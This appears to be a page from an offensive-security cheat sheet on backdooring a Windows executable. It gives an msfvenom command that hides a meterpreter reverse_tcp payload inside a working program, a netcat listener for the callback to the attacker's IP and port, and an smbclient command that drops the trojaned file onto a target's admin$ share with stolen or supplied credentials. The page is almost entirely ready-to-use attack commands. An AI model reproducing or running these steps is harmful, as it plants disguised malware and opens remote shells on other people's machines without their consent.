TROJAN BACKDOOR

INJECTING BACKDOOR

root@oco:~$ msfvenom -a x64 --platform windows -x {executableName}.exe -k -p windows/meterpreter/reverse_tcp lhost={attackerIP} lport={attackerPort} -b "\x00" -f exe -o {executableName}.exe

DROPPING TO A WRITABLE SHARE

root@oco:~$ nc -nlvp {attackerPort}
root@oco:~$ msfvenom -a x64 --platform windows -x {executableName}.exe -k -p windows/meterpreter/reverse_tcp lhost={attackerIP} lport={attackerPort} -b "\x00" -f exe -o {executableName}.exe
 * -k will keep the original functionality of the executable
 * -b "\x00" specifies bad characters to avoid in the payload, such as null bytes (\x00). 
   these are typically characters that would break the exploit if included.
root@oco:~$ smbclient -c 'put {executableName}.exe' -U {user} -W {domain} '//{ipAddress}/admin$/' {password}

PreviousTROJANSNextMALICIOUS DOCUMENTS

Last updated